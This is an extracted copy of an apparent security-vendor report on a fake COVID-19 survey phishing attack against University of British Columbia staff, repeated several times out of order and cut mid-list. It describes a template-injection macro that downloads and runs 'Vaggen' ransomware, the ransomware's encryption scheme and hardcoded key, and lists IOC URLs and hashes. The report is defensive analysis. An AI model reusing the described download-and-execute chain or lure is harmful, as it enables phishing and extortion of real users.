/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 887 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 888 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 889 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 890 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 891 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 892 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 893 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 894 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 895 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 896 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 897 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 898 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 899 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 900 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 901 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 902 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 903 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 904 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 905 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 906 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 907 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 908 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 909 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 910 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 911 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 912 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 913 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 914 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 915 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 916 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 917 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 918 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 919 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 920 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]c